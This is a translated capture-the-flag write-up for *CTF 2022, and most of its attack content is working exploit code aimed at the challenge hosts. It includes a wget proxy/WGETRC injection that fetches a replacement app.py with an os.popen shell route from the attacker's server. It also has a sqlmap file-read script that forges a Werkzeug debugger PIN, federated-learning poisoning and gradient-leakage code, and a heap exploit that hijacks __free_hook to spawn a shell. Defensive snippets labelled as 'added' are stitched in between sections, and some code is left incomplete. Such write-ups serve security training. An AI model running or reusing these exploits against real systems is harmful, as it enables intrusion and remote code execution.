2022startctf-wp

Article source: EDI安全

01

Web

1

oh-my-lotto

Download the wget source and look through all the environment variables it honours.

They can be used to load a proxy, so we upload a proxy configuration for wget to pick up, intercept the request to lotto, modify the response, and get the flag.

Forward the local Burp instance to the server:

```shell
ssh -p 22 -f -g -C -N -R 8080:127.0.0.1:8080 root@120.26.59.137
```

Add a hosts entry.

Start a web service that returns the proxy configuration:

```python
from flask import Flask, make_response
import secrets

app = Flask(__name__)


@app.route("/")
def index():
    lotto = []
    for i in range(1, 20):
        n = str(secrets.randbelow(40))
        lotto.append(n)
    r = '\n'.join(lotto)
    # Overwrite the lotto numbers with the proxy configuration wget will pick up
    r = "http_proxy=http://120.26.59.137:8080"
    response = make_response(r)
    response.headers['Content-Type'] = 'text/plain'
    response.headers['Content-Disposition'] = 'attachment; filename=lotto_result.txt'
    return response


if __name__ == "__main__":
    app.run(debug=True, host='0.0.0.0', port=80)
```

After starting it locally, brute-force the md5.

Upload a file that sets the proxy to my server:

```http
POST /forecast HTTP/1.1
Host: 121.36.217.177:53002
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------2363992665965896981350789360
Content-Length: 249
Origin: http://127.0.0.1:8880
Connection: close
Referer: http://127.0.0.1:8880/forecast
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-Forwarded-For: 1.1.1.1
X-Originating-IP: 1.1.1.1
X-Remote-IP: 1.1.1.1
X-Remote-Addr: 1.1.1.1

-----------------------------2363992665965896981350789360
Content-Disposition: form-data; name="file"; filename="2.jpg"
Content-Type: image/jpeg

http_proxy=http://120.26.59.137:8080
-----------------------------2363992665965896981350789360--
```

Load the proxy configuration; the response for the requested URL is now under our control:

```http
POST /lotto HTTP/1.1
Host: 121.36.217.177:53002
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------134338874213176516492993923776
Content-Length: 324
Origin: http://127.0.0.1:8880
Connection: close
Referer: http://127.0.0.1:8880/lotto
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-Forwarded-For: 1.1.1.1
X-Originating-IP: 1.1.1.1
X-Remote-IP: 1.1.1.1
X-Remote-Addr: 1.1.1.1

-----------------------------134338874213176516492993923776
Content-Disposition: form-data; name="lotto_key"

WGETRC
-----------------------------134338874213176516492993923776
Content-Disposition: form-data; name="lotto_value"

/app/guess/forecast.txt
-----------------------------134338874213176516492993923776--
```
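The root cause above is that wget trusts whatever proxy and `WGETRC` settings it finds in its environment. As an added defensive example (not code from the write-up or the challenge), this is how a service that shells out to wget can strip those variables and tell wget to ignore any rc file; the variable list is assembled here from the write-up plus wget's documented proxy variables:

```python
import os
import subprocess

# Environment variables wget reads that change where a download goes or
# which config is loaded. Assembled for this example: the write-up names
# http_proxy and WGETRC; the rest are wget's documented proxy variants.
WGET_SENSITIVE_VARS = {
    "WGETRC",
    "http_proxy", "https_proxy", "ftp_proxy", "no_proxy",
    "HTTP_PROXY", "HTTPS_PROXY", "FTP_PROXY", "NO_PROXY",
}


def scrub_wget_env(env):
    """Return a copy of env without any variable that can redirect wget."""
    return {k: v for k, v in env.items() if k not in WGET_SENSITIVE_VARS}


def wget_argv(url, output_path):
    """Command line that also ignores ~/.wgetrc and any proxy setting
    (--no-config and --no-proxy are real wget flags)."""
    return ["wget", "--no-config", "--no-proxy", "-O", output_path, "--", url]


def run_wget(url, output_path, base_env=None):
    """Fetch url with a scrubbed environment; returns the CompletedProcess."""
    env = scrub_wget_env(os.environ if base_env is None else base_env)
    return subprocess.run(wget_argv(url, output_path), env=env, check=False)
```

Scrubbing the environment and passing `--no-config` are independent layers: the first blocks values injected into the process environment, the second blocks a planted rc file.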

2

oh-my-lotto-revenge

The challenge author turned on debug, so the proxy can be used directly to replace app.py.

```python
from flask import Flask, make_response
import secrets

app = Flask(__name__)


@app.route("/")
def index():
    lotto = []
    for i in range(1, 20):
        n = str(secrets.randbelow(40))
        lotto.append(n)
    r = '\n'.join(lotto)
    r = "http_proxy=http://120.26.59.137:8080"
    # Serve our own exp1.py so that it gets written over app.py
    r = open("exp1.py", 'r').read()
    response = make_response(r)
    response.headers['Content-Type'] = 'text/plain'
    response.headers['Content-Disposition'] = 'attachment; filename=app.py'
    return response


if __name__ == "__main__":
    app.run(debug=True, host='0.0.0.0', port=80)
```

The main part is the shell route:

```python
@app.route("/edi", methods=['GET', 'POST'])
def index():
    return os.popen(request.query_string.get('edi')).read()
```

The author uses gunicorn to keep Python running, so it does not reload promptly (you might think that was the end of it?).

You can simply intercept the packet with Burp and hold it until gunicorn restarts the worker.

All you have to do is keep requesting the shell route.

3

oh-my-notepro

Write a script to drive sqlmap:

```python
import os
import re
import sys
import hashlib
from itertools import chain

# Author: R1CH0ND from EDISEC
# USAGE: python3 readanything.py web1.txt


def load(dirname):
    return Generic_Config + "--tech=S --sql-query={}".format(
        "load data local infile \"{}\" into table shit".format(dirname))


def read():
    return Generic_Config + "--tech=E --sql-query=\"{}\"".format("select go from shit")


def loadNread(filename):
    # Create the scratch table, load the target file into it, then read it back
    os.system(Generic_Config + "--tech=S --sql-query=CREATE TABLE shit (go TEXT)")
    os.system(load(filename))
    r = os.popen(read())
    ret = r.read()
    r.close()
    return ret


dirs = {
    'wangka': "/sys/class/net/eth0/address",
    'mid1': "/proc/sys/kernel/random/boot_id",
    'mid2': "/proc/self/cgroup",
}
packfile = sys.argv[1]
Generic_Config = "sqlmap -r {} --random-agent --fresh-queries --batch -p note_id --dbms=mysql ".format(packfile)
wangka = re.findall(r"(\w+:\w+:\w+:\w+:\w+:\w+)", loadNread("/sys/class/net/eth0/address"))[0]
cg = re.findall(r"docker/(\w+)", loadNread("/proc/self/cgroup"))[0]
mid = "1cc402dd0e11d5ae18db04a6de87223d"

probably_public_bits = [
    'ctf',  # from /etc/passwd
    'flask.app',  # default value
    'Flask',  # default value
    '/usr/local/lib/python3.8/site-packages/flask/app.py',  # obtained from the error page
]

private_bits = [
    str(int(wangka.replace(":", ""), 16)),  # /sys/class/net/eth0/address, hex converted to decimal
    # machine_id is the concatenation of three parts (in docker only the last two):
    # 1. /etc/machine-id  2. /proc/sys/kernel/random/boot_id  3. /proc/self/cgroup
    mid + cg,
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)
```

Capture a request:

```http
GET /view?note_id=yvsn3yt4kdhtl2zfqsscl5i6l12mma0p HTTP/1.1
Host: 124.70.185.87:5002
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: session=eyJjc3JmX3Rva2VuIjoiY2ViOWI0NWFkYjM2ZmQ3N2M1NTI0NDJmNjUwODJiZDI0YzcyOTgzNiIsInVzZXJuYW1lIjoiYWRtaW4ifQ.Ylotsg.tKGQ3pgsO1RTw51C7lcCAgA0YfYU
Upgrade-Insecure-Requests: 1
```

Then run `python3 readanything.py web1.txt`

to get the PIN.

Try the candidates on the target one by one, then `import os;os.system('/readflag')`.
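Every file the PIN script above reads goes through `LOAD DATA LOCAL INFILE`, which leaves a clear trail in the MySQL general log. As an added detection example (not part of the write-up), this scans constructed general-log lines, flags every local-infile read, and marks reads of the Werkzeug PIN inputs listed above as critical; the log lines are constructed for this example:

```python
import re

# Constructed MySQL general-log excerpt for this example (not from the challenge host).
SAMPLE_LOG = """\
2022-04-17T10:21:03.000000Z\t12 Query\tSELECT title FROM notes WHERE note_id='abc'
2022-04-17T10:21:05.000000Z\t12 Query\tCREATE TABLE shit (go TEXT)
2022-04-17T10:21:06.000000Z\t12 Query\tload data local infile "/sys/class/net/eth0/address" into table shit
2022-04-17T10:21:07.000000Z\t12 Query\tselect go from shit
2022-04-17T10:21:09.000000Z\t12 Query\tLOAD DATA LOCAL INFILE '/proc/self/cgroup' INTO TABLE shit
2022-04-17T10:21:11.000000Z\t13 Query\tLOAD DATA LOCAL INFILE '/tmp/upload.csv' INTO TABLE imports
"""

# Files the Werkzeug debugger PIN is derived from (the ones the write-up reads).
PIN_SOURCES = {
    "/etc/machine-id",
    "/proc/sys/kernel/random/boot_id",
    "/proc/self/cgroup",
    "/sys/class/net/eth0/address",
}

LOCAL_INFILE_RE = re.compile(
    r"""load\s+data\s+local\s+infile\s+["']([^"']+)["']""", re.IGNORECASE)


def scan_general_log(text):
    """Return (line_no, path, severity) for every LOCAL INFILE read.

    Reads of a PIN input are 'critical'; any other local-infile read is a
    'warning' worth reviewing (the feature is off when local_infile=0)."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOCAL_INFILE_RE.search(line)
        if m:
            path = m.group(1)
            hits.append((n, path, "critical" if path in PIN_SOURCES else "warning"))
    return hits


def pin_material_exposed(hits):
    """True once both halves of the PIN input (MAC address and a machine-id
    component) have been read, i.e. the debugger PIN can be rebuilt."""
    paths = {p for _, p, _ in hits}
    machine_id_parts = {"/etc/machine-id", "/proc/sys/kernel/random/boot_id", "/proc/self/cgroup"}
    return "/sys/class/net/eth0/address" in paths and bool(paths & machine_id_parts)
```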

4

oh-my-grafana

Download xxxx

admin5f989714e132c9b04d4807dafeb10ade http://124.70.163.46:3000

Piggybacking: there is an already configured datasource.

Later it turned out the credentials were simply the default grafana / grafana.

SQL query

02

Misc

1

babyFL

Train; try a few times.

```python
import tensorflow
import os
import traceback
import numpy as np
from tensorflow.keras import Sequential
from tensorflow.keras.layers import Dense, Conv2D, Flatten, MaxPooling2D
from tensorflow import keras
from tensorflow.keras.models import load_model
from tensorflow.keras.datasets import mnist

participant_number = 20


def new_model():
    model = Sequential()
    model.add(Conv2D(10, (3, 3), input_shape=(28, 28, 1)))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    model.add(Conv2D(20, (3, 3)))
    model.add(Flatten())
    model.add(Dense(units=100, activation='relu'))
    model.add(Dense(units=10, activation='softmax'))
    model.compile(loss=keras.losses.SparseCategoricalCrossentropy(), metrics=['accuracy'],
                  optimizer=keras.optimizers.Adam(lr=0.001))
    return model


def load_test_data():
    # The challenge tests on MNIST with flipped labels (9 - y)
    (_, _), (x, y) = mnist.load_data()
    l = len(y)
    for i in range(l):
        y[i] = 9 - y[i]
    x = x.reshape(-1, 28, 28, 1)
    return x, y


def train_models(a='model'):
    (x, y), (_, _) = mnist.load_data()
    if a == 'mymodel':
        # Our own model is trained on the flipped labels
        l = len(y)
        for i in range(l):
            y[i] = 9 - y[i]
    x = x.reshape(-1, 28, 28, 1)
    if a == 'mymodel':
        model = new_model()
        model.fit(x, y, batch_size=64, epochs=6)
        for i in range(participant_number):
            model.save("./{}/".format(a) + str(i))
    else:
        # Simulate the 20 honest participants with 4 distinct models
        for i in range(4):
            model = new_model()
            model.fit(x, y, batch_size=64, epochs=5)
            model.save("./{}/".format(a) + str(5 * i))
            model.save("./{}/".format(a) + str(5 * i + 1))
            model.save("./{}/".format(a) + str(5 * i + 2))
            model.save("./{}/".format(a) + str(5 * i + 3))
            model.save("./{}/".format(a) + str(5 * i + 4))


def aggregation(parameters):
    # Plain averaging of each layer across all participants
    print('aggregation')
    weights = []
    for layer in parameters:
        sum = 0
        l = len(layer)
        for temp in layer:
            sum = sum + temp
        weights.append(sum / l)
        # weights.append(layer[2])
    model = new_model()
    l = len(model.get_weights())
    model.set_weights(weights)
    return model


def test(model):
    print('test')
    my_x, my_y = load_test_data()
    loss, acc = model.evaluate(my_x, my_y, batch_size=64)
    print(acc)
    if acc > 0.95:
        print('great!')
        f = open('./flag')
        print(f.read())
    else:
        print("you fail", acc)


def load_parameters(a='model'):
    print('load parameter')
    parameters = []
    models = []
    for i in range(participant_number):
        models.append(load_model("./{}/".format(a) + str(i)))
    for i in range(8):
        layer = []
        for j in range(participant_number):
            temp = models[j].get_weights()
            layer.append(temp[i])
        parameters.append(layer)
    return parameters


def get_val(arr):
    if len(arr.shape) > 1:
        for temp in arr:
            get_val(temp)
    else:
        l = len(arr)
        for i in range(l):
            arr[i] = float(input())


def get_input_parameter(parameters):
    print('get input parameter')
    for layer in parameters:
        input_weight = np.zeros(layer[0].shape)
        print("next layer:")
        get_val(input_weight)
        layer.append(input_weight)
    return parameters


def cal_input_para(raw_para, my_para):
    # Craft the 21st participant so that the average of all 21 equals our model
    weights = []
    for i in range(len(raw_para)):
        layer_raw = raw_para[i]
        layer_my = my_para[i]
        sum = 0
        l = len(my_para)
        for temp in layer_my:
            sum = sum + temp
        my_weight = sum / l
        sum = 0
        l = len(layer_raw) + 1
        for temp in layer_raw:
            sum = sum + temp
        weight = l * my_weight - sum
        weights.append(weight)
        # weights.append(layer[2])
    return weights


def get_input_parameter2(parameters, out):
    print('get input parameter')
    for i in range(len(parameters)):
        layer = parameters[i]
        input_weight = np.zeros(layer[0].shape)
        input_weight = out[i]
        print("next layer:")
        get_val2(input_weight)
        layer.append(input_weight)
    return parameters


def get_val2(arr):
    if len(arr.shape) > 1:
        for temp in arr:
            get_val2(temp)
    else:
        l = len(arr)
        for i in range(l):
            arr[i] = float(1)


train_models()
train_models('mymodel')
parameters1 = load_parameters()
a = load_parameters()
parameters2 = load_parameters('mymodel')
parameters_out = cal_input_para(a, parameters2)
get_input_parameter2(a, parameters_out)

import pickle
pickle.dump(a, open('11.txt', 'wb'))

model = aggregation(parameters1)
test(model)
model = aggregation(parameters2)
test(model)
model = aggregation(a)
test(model)
```

Submit the parameters:

```python
import pickle
from pwn import *

a = pickle.load(open('11.txt', 'rb'))


def foo2(arr, r):
    # Walk the array recursively and send each scalar on its own line
    if len(arr.shape) > 1:
        for temp in arr:
            print(a)
            foo2(temp, r)
    else:
        l = len(arr)
        for i in range(l):
            r.sendline(str(arr[i]))
            print(arr[i])
            # arr[i] = float(input())


def foo(parameters, r):
    for i in range(8):
        print('layer: {}'.format(i))
        input_weight = a[i]
        # Entry 20 of each layer is the crafted 21st participant
        foo2(input_weight[20], r)


r = remote("124.70.158.154", 8081)
r.recvuntil('next layer:\n')
foo(a, r)
r.interactive()
```
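The crafted update works because the server aggregates with a plain mean, which a single participant can steer to any value with the `l * my_weight - sum` formula from `cal_input_para`. As an added example (not from the write-up), this reproduces that hijack on constructed per-coordinate updates and shows that coordinate-wise median or trimmed-mean aggregation ignores the outlier; the honest values and the target are constructed for the demonstration:

```python
import statistics


def fedavg(updates):
    """Plain federated averaging: per-coordinate mean over participant vectors."""
    return [sum(col) / len(col) for col in zip(*updates)]


def craft_hijack_update(honest_updates, target):
    """The write-up's formula weight = l*my_weight - sum with l = len(honest)+1:
    averaging the honest updates plus this one yields exactly `target`."""
    l = len(honest_updates) + 1
    return [l * t - sum(col) for t, col in zip(target, zip(*honest_updates))]


def coordinate_median(updates):
    """Robust alternative: per-coordinate median."""
    return [statistics.median(col) for col in zip(*updates)]


def trimmed_mean(updates, trim):
    """Robust alternative: drop the `trim` smallest and largest per coordinate."""
    out = []
    for col in zip(*updates):
        kept = sorted(col)[trim:len(col) - trim]
        out.append(sum(kept) / len(kept))
    return out


def demo(n_honest=20, target=(-3.0, 2.0)):
    # Constructed honest updates: two coordinates clustered around 0.5 and -0.5.
    honest = [[0.5 + 0.01 * i, -0.5 + 0.01 * i]
              for i in range(-n_honest // 2, n_honest // 2)]
    crafted = craft_hijack_update(honest, list(target))
    everyone = honest + [crafted]
    return {
        "mean": fedavg(everyone),              # lands exactly on the target
        "median": coordinate_median(everyone),  # stays with the honest cluster
        "trimmed": trimmed_mean(everyone, trim=1),
    }
```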

2

Alice's challenge

The core principle: deep learning model + gradient data ⇒ (reconstruct) ⇒ training sample.

Found this: [https://dlg.mit.edu/](https://dlg.mit.edu/)

Understand the basic principle of the gradient leakage attack; with minor changes the code runs and recovers the sample.

There are two key points:

(1) Reversing the model structure

```python
import torch.nn as nn


class AliceNet2(nn.Module):
    def __init__(self):
        super(AliceNet2, self).__init__()
        act = nn.Sigmoid
        self.conv = nn.Sequential(
            nn.Conv2d(3, 12, kernel_size=5, padding=2, stride=2),
            act(),
            nn.Conv2d(12, 12, kernel_size=5, padding=2, stride=2),
            act(),
            nn.Conv2d(12, 12, kernel_size=5, padding=2, stride=1),
            act(),
            nn.Conv2d(12, 12, kernel_size=5, padding=2, stride=1),
            act(),
        )
        self.fc = nn.Sequential(nn.Linear(768, 200))

    def forward(self, x):
        out = self.conv(x)
        out = out.view(out.size(0), -1)
        out = self.fc(out)
        return out
```

(2) Loading the gradient given by the challenge

```python
dy_dx = torch.autograd.grad(y, net.parameters())
dy_dx = torch.load('0.tensor')  # 0-24
# Exchange gradient with other training nodes
original_dy_dx = list((_.detach().clone() for _ in dy_dx))
```

The result is as follows:

03

Re

1

Naci

```c
#include <stdio.h>
#define ROL(x, y) ((x << y) | (x >> (32 - y)))

unsigned int data[] = {0x04050607,0x00010203,0x0C0D0E0F,0x08090A0B,0xCD3FE81B,0xD7C45477,0x9F3E9236,0x0107F187,0xF993CB81,0xBF74166C,0xDA198427,0x1A05ABFF,0x9307E5E4,0xCB8B0E45,0x306DF7F5,0xAD300197,0xAA86B056,0x449263BA,0x3FA4401B,0x1E41F917,0xC6CB1E7D,0x18EB0D7A,0xD4EC4800,0xB486F92B,0x8737F9F3,0x765E3D25,0xDB3D3537,0xEE44552B,0x11D0C94C,0x9B605BCB,0x903B98B3,0x24C2EEA3,0x896E10A2,0x2247F0C0,0xB84E5CAA,0x8D2C04F0,0x3BC7842C,0x1A50D606,0x49A1917C,0x7E1CB50C,0xFC27B826,0x5FDDDFBC,0xDE0FC404,0xB2B30907};

int main(void)
{
    /* the initial values of x and y are missing from the page */
    unsigned int x = , y = , p;
    /* 44 rounds of the forward transform */
    for (int i = 0; i < 44; i++) {
        p = (ROL(x, 1) & ROL(x, 8)) ^ ROL(x, 2) ^ y ^ data[i];
        y = x;
        x = p;
    }
    printf("%x, %x", x, y);
}
```

```c
#include <stdio.h>
#include <math.h>
#define ROL(x, y) ((x << y) | (x >> (32 - y)))

unsigned int data[] = {0x04050607,0x00010203,0x0C0D0E0F,0x08090A0B,0xCD3FE81B,0xD7C45477,0x9F3E9236,0x0107F187,0xF993CB81,0xBF74166C,0xDA198427,0x1A05ABFF,0x9307E5E4,0xCB8B0E45,0x306DF7F5,0xAD300197,0xAA86B056,0x449263BA,0x3FA4401B,0x1E41F917,0xC6CB1E7D,0x18EB0D7A,0xD4EC4800,0xB486F92B,0x8737F9F3,0x765E3D25,0xDB3D3537,0xEE44552B,0x11D0C94C,0x9B605BCB,0x903B98B3,0x24C2EEA3,0x896E10A2,0x2247F0C0,0xB84E5CAA,0x8D2C04F0,0x3BC7842C,0x1A50D606,0x49A1917C,0x7E1CB50C,0xFC27B826,0x5FDDDFBC,0xDE0FC404,0xB2B30907};
unsigned int enc[] = {0xFDF5C266,0x7A328286,0xCE944004,0x5DE08ADC,0xA6E4BD0A,0x16CAADDC,0x13CD6F0C,0x1A75D936,0};
unsigned int key[] = {0x03020100,0x07060504,0x0B0A0908,0x0F0E0D0C};

void decipher(unsigned int num_rounds, unsigned int v[2], unsigned int const key[4])
{
    unsigned int i;
    unsigned int v0 = v[0], v1 = v[1], delta = 0x10325476, sum = delta * num_rounds;
    unsigned int x, y, p;
    /* undo the XTEA-style rounds (non-standard delta and key index) */
    for (i = 0; i < num_rounds; i++) {
        v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
        sum -= delta;
        v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
    }
    /* then run the 44 rotate/and/xor rounds backwards */
    x = v1, y = v0;
    for (int i = 0; i < 44; i++) {
        p = (ROL(y, 1) & ROL(y, 8)) ^ ROL(y, 2) ^ x ^ data[43 - i];
        x = y;
        y = p;
    }
    v[0] = x, v[1] = y;
}

int main(void)
{
    unsigned int x, y, p;
    for (int i = 0; i < 4; i++) {
        unsigned int *tmp = enc + 2 * i;
        /* block i was enciphered with 2^(i+1) rounds */
        decipher(pow(2, i + 1), enc + 2 * i, key);
        for (int i = 0; i < 2; i++)
            for (int j = 0; j < 4; j++)
                printf("%c", ((char *)&tmp[i])[3 - j]);
    }
}
```

2

Simple File System

Check the file information

An ELF file

Static analysis

Looking at the strings, this keyword is found

Find the key logic. Analysis shows that the flag file is actually opened only when the third argument of sub_1E16 equals 1.

After the encryption function shown below, the result is written to the image.flag file.

Values obtained by dynamic debugging:

v4 = 0xDEEDBEEF

a2 = 0x1000

Since we know the encryption function, we can encrypt the input *CTF and then locate the ciphertext in the flag file.

The ciphertext found is:

0x00, 0xD2, 0xFC, 0xD8, 0xA2, 0xDA, 0xBA, 0x9E, 0x9C, 0x26, 0xF8, 0xF6, 0xB4, 0xCE, 0x3C, 0xCC, 0x96, 0x88, 0x98, 0x34, 0x82, 0xDE, 0x80, 0x36, 0x8A, 0xD8, 0xC0, 0xF0, 0x38, 0xAE, 0x40

exp

```python
data = [0x00, 0xD2, 0xFC, 0xD8, 0xA2, 0xDA, 0xBA, 0x9E, 0x9C, 0x26, 0xF8, 0xF6, 0xB4, 0xCE, 0x3C, 0xCC,
        0x96, 0x88, 0x98, 0x34, 0x82, 0xDE, 0x80, 0x36, 0x8A, 0xD8, 0xC0, 0xF0, 0x38, 0xAE, 0x40]
v4 = [0xEF, 0xBE, 0xED, 0xDE]  # 0xDEEDBEEF as little-endian bytes


def dcry(data, v4):
    # Undo the per-byte rotate/xor chain of the encryption function
    for i in range(len(data)):
        v5 = data[i]
        v5 = (v5 >> 3) | (v5 << 5) & 0xff
        v5 ^= v4[3]
        v5 = (v5 >> 4) | (v5 << 4) & 0xff
        v5 ^= v4[2]
        v5 = (v5 >> 5) | (v5 << 3) & 0xff
        v5 ^= v4[1]
        v5 = (v5 >> 6) | (v5 << 2) & 0xff
        v5 ^= v4[0]
        v5 = (v5 >> 7) | (v5 << 1) & 0xff
        data[i] = v5
    return data


flag = dcry(data, v4)
print(flag)
print(''.join(map(chr, flag)))
```
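The write-up locates the ciphertext by encrypting the known prefix `*CTF` and searching for it in image.flag, but only shows the decrypt direction. As an added example (not code from the write-up), this implements the forward byte transform as the exact inverse of `dcry`, confirms it maps `*CTF` onto the first four ciphertext bytes quoted above, and does the known-plaintext search over a constructed file image:

```python
V4 = [0xEF, 0xBE, 0xED, 0xDE]          # v4 = 0xDEEDBEEF from the write-up, as LE bytes
KNOWN_CT = [0x00, 0xD2, 0xFC, 0xD8]    # first four ciphertext bytes from the write-up


def ror8(b, n):
    return ((b >> n) | (b << (8 - n))) & 0xFF


def rol8(b, n):
    return ((b << n) | (b >> (8 - n))) & 0xFF


def decrypt_byte(c):
    """Per-byte form of the write-up's dcry: ror3, ^v4[3], ror4, ^v4[2], ..., ror7."""
    c = ror8(c, 3); c ^= V4[3]
    c = ror8(c, 4); c ^= V4[2]
    c = ror8(c, 5); c ^= V4[1]
    c = ror8(c, 6); c ^= V4[0]
    return ror8(c, 7)


def encrypt_byte(p):
    """Inverse of decrypt_byte: same steps in reverse order, each rotation undone."""
    p = rol8(p, 7); p ^= V4[0]
    p = rol8(p, 6); p ^= V4[1]
    p = rol8(p, 5); p ^= V4[2]
    p = rol8(p, 4); p ^= V4[3]
    return rol8(p, 3)


def encrypt(data):
    return [encrypt_byte(b) for b in data]


def decrypt(data):
    return [decrypt_byte(b) for b in data]


def find_known_plaintext(blob, plaintext=b"*CTF"):
    """Offset of encrypt(plaintext) inside blob (e.g. image.flag), or -1."""
    return bytes(blob).find(bytes(encrypt(plaintext)))


# Constructed stand-in for image.flag: junk, then the encrypted flag prefix, then more junk.
SAMPLE_IMAGE = bytes([0x41, 0x42, 0x43]) + bytes(KNOWN_CT) + bytes([0xAA, 0xBB])
```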

04

Pwn

1

examination

```python
# -*- encoding: utf-8 -*-
import sys
import os
import requests
from pwn import *

binary = './examination'
os.system('chmod +x %s' % binary)
context.update(os='linux', arch='amd64', timeout=1)
context.binary = binary
context.log_level = 'debug'
elf = ELF(binary)
libc = elf.libc
libc = ELF()  # the libc path is missing from the page
DEBUG = 0
if DEBUG:
    libc = elf.libc
    p = process(binary)
else:
    host = '124.70.130.92'
    port = 60001
    p = remote(host, port)

l64 = lambda: ras(u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')))
l32 = lambda: ras(u32(p.recvuntil('\xf7')[-4:].ljust(4, '\x00')))
uu64 = lambda a: ras(u64(p.recv(a).ljust(8, '\x00')))
uu32 = lambda a: ras(u32(p.recv(a).ljust(4, '\x00')))
rint = lambda x=12: ras(int(p.recv(x), 16))
sla = lambda a, b: p.sendlineafter(str(a), str(b))
sa = lambda a, b: p.sendafter(str(a), str(b))
lg = lambda name, data: p.success(name + ': \033[1;36m 0x%x \033[0m' % data)
se = lambda payload: p.send(payload)
rl = lambda: p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a: p.recvuntil(str(a))


def ras(data):
    lg('leak', data)
    return data


def dbg(b='null'):
    if b == 'null':
        gdb.attach(p)
        pause()
    else:
        gdb.attach(p, 'b %s' % b)


# Menu wrappers for the examination binary
def cmd(num):
    sla('>>', num)


def tch_to_std():
    cmd(5)
    sla('<0.teacher/1.student>:', 1)


def std_to_tch():
    cmd(5)
    sla('<0.teacher/1.student>:', 0)


def add_std(num):
    cmd(1)
    sla('questions', num)


def score():
    cmd(2)


def one_add(addr):
    cmd(2)
    sla('addr:', addr)


def add_cmt(idx, size, text='a'):
    cmd(3)
    sla('>', idx)
    sla('size of comment:', size)
    sa('enter your comment:\n', text)


def edit_cmt(idx, text='a'):
    cmd(3)
    sla('>', idx)
    sa('enter your comment:\n', text)


def delete(idx):
    cmd(4)
    sla('choose?', idx)


def chid(idx):
    cmd(6)
    sla('id:', idx)


one_gad = one_gadget(libc.path)  # one_gadget helper is not defined on the page


def attack():
    sla('<0.teacher/1.student>:', 0)
    add_std(1)
    add_cmt(0, 0x18)
    add_std(1)
    add_cmt(1, 0x3f8)
    add_std(1)
    add_std(1)
    tch_to_std()
    cmd(3)
    chid(1)
    cmd(3)
    std_to_tch()
    score()
    tch_to_std()
    cmd(2)
    ru('0x')
    heap_base = rint() & 0xfffffffff000
    lg('target', heap_base)
    sla('addr:', str(heap_base + 0x2e0) + '\x00')
    chid(1)
    one_add(str(heap_base + 0x2e0) + '\x00')
    std_to_tch()
    edit_cmt(0, 'a' * 0x18 + p16(0x400 + 0x50 + 1))
    delete(1)
    add_std(1)
    add_cmt(2, 0x3f8)
    edit_cmt(0, 'a' * 0x18 + p16(0x400 + 0x50 + 1))
    delete(3)
    add_std(1)
    tch_to_std()
    chid(2)
    score()
    __malloc_hook = l64() - 0x70
    libc.address = __malloc_hook - libc.sym['__malloc_hook']
    system_addr = libc.sym['system']
    __free_hook = libc.sym['__free_hook']
    binsh_addr = libc.search('/bin/sh').next()
    lg('__free_hook', __free_hook)
    std_to_tch()
    add_std(1)
    payload = flat(heap_base + 0x390, 0, 0, 0, 0, 0x21, 1, __free_hook - 0x8, 0x20)
    edit_cmt(2, payload)
    edit_cmt(4, flat('/bin/sh\x00', system_addr))
    delete(4)
    dbg()
    p.success('getShell()')
    p.interactive()


attack()
```
